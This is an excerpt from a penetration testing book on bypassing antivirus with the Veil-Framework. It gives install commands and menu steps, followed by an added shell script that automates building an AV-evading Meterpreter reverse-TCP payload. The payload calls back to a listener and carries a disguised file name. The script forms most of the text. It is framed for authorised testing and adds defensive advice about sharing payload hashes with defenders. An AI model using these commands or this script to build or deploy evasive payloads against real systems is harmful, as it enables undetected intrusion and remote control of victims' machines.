Advanced Infrastructure Penetration Testing
Overview of this book

It has always been difficult to gain hands-on experience and a comprehensive understanding of advanced penetration testing techniques and vulnerability assessment and management. This book will be your one-stop solution to compromising complex network devices and modern operating systems. This book provides you with advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN. With this book, you will explore exploitation abilities such as offensive PowerShell tools and techniques, CI servers, database exploitation, Active Directory delegation, kernel exploits, cron jobs, VLAN hopping, and Docker breakouts. Moving on, this book will not only walk you through managing vulnerabilities, but will also teach you how to ensure endpoint protection. Toward the end of this book, you will also discover post-exploitation tips, tools, and methodologies to help your organization build an intelligent security system. By the end of this book, you will have mastered the skills and methodologies needed to breach infrastructures and provide complete endpoint protection for your system.
Table of Contents (14 chapters)

Bypassing antivirus with the Veil-Framework

As a penetration tester, remember that you are simulating real-world attacks, and real attackers routinely bypass antivirus protection with a range of techniques. The Veil-Framework is a well-known tool for generating payloads that evade signature-based detection. To install Veil 3.0, clone it from its official GitHub repository at https://github.com/Veil-Framework/Veil and run the bundled setup script, which installs the dependencies (compilers and a Wine environment) that the payload generators need:

# git clone https://github.com/Veil-Framework/Veil
# cd Veil && ./config/setup.sh --force --silent

Now launch Veil (./Veil.py from the cloned directory) and drive it from its interactive main menu; the book's screenshots of each step are not reproduced here:

1. At the main menu, type list to show the available tools, then use 1 to select the Evasion tool, which is the payload generator.
2. Type list again to see the available payloads.
3. Select a payload with the use command, followed by its number or name from the list.
4. Enter generate to build the payload.
5. Fill in the remaining options (at minimum the listener address and port, LHOST and LPORT) and Veil writes the payload to its output directory.

"Undetectable" here means only that the fresh payload is not matched by most signature-based engines at the time it is generated; Veil output is well known, vendors write signatures for it quickly, and behavioural engines may still flag it. Test the payload against the same product the target runs, in an isolated lab, and never submit it to a public multi-engine scanner, which shares samples with vendors and burns the payload before the engagement starts.
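The menu steps above, scripted as one non-interactive, reproducible build that also records the hash of what was produced. This is an added example, not code from the book or from the Veil project. It assumes Veil 3's command-line flags (-t, -p, --ip, --port and -o, as shown by ./Veil.py --help), Veil 3's default output directory /var/lib/veil/output, the payload name python/meterpreter/rev_tcp.py, and the hypothetical listener 10.0.0.5, port 4444 and output name update_svc used in the usage line.

```shell
#!/bin/sh
# Added example (not the book's code): drive Veil 3 non-interactively so a build
# is reproducible and logged, instead of clicking through the menus by hand.
# Assumptions: Veil 3.x is cloned in VEIL_DIR and exposes the command-line flags
# -t/-p/--ip/--port/-o (check "./Veil.py --help" on your install), and compiled
# output lands in VEIL_OUTPUT/compiled (Veil 3's default is /var/lib/veil/output).
set -u

VEIL_DIR="${VEIL_DIR:-${HOME:-/root}/Veil}"
VEIL_OUTPUT="${VEIL_OUTPUT:-/var/lib/veil/output}"
VEIL_PAYLOAD="${VEIL_PAYLOAD:-python/meterpreter/rev_tcp.py}"   # a Veil 3 payload name

# Strict whitelist checks: a mistyped LHOST would quietly produce a payload that
# calls back to the wrong host, and the values end up on a shell command line.
valid_ipv4() {
    ip=$1
    case $ip in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.; set -- $ip; IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

valid_port() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ ${#1} -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the exact Veil command for LHOST/LPORT/output name, or fail on bad input.
# The printed line goes into the engagement log so the build can be repeated.
build_veil_cmd() {
    lhost=$1; lport=$2; outname=$3
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    case $outname in
        ''|*[!A-Za-z0-9_-]*) echo "bad output name: $outname" >&2; return 1 ;;
    esac
    printf '%s' "python3 '$VEIL_DIR/Veil.py' -t Evasion -p $VEIL_PAYLOAD --ip $lhost --port $lport -o $outname"
}

# Build the payload and print the SHA-256 of the artifact. The hash goes in the
# report so the blue team can match exactly what was dropped; do not "check" the
# sample on a public multi-engine scanner, which shares it with AV vendors.
# Return codes: 1 bad input, 2 Veil not installed, 3 build failed, 4 no artifact.
generate_payload() {
    cmd=$(build_veil_cmd "$1" "$2" "$3") || return 1
    if [ ! -f "$VEIL_DIR/Veil.py" ]; then
        echo "Veil not found at $VEIL_DIR; would run: $cmd" >&2
        return 2
    fi
    echo "running: $cmd" >&2
    eval "$cmd" || return 3            # every argument was whitelisted above
    artifact="$VEIL_OUTPUT/compiled/$3.exe"   # Veil 3 names compiled output <name>.exe
    [ -f "$artifact" ] || { echo "no artifact at $artifact" >&2; return 4; }
    sha256sum "$artifact"
}

# Usage (needs a working Veil install; without one it reports the command it would run):
# generate_payload 10.0.0.5 4444 update_svc
```

The whitelist checks exist because the values are interpolated into a command line and because a wrong callback address is the most common reason a "working" payload never phones home; the hash line is what you hand to the defenders after the engagement so they can confirm which file the AV did or did not catch.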

You can also do an Nmap scan using Metasploit, exporting the results and importing...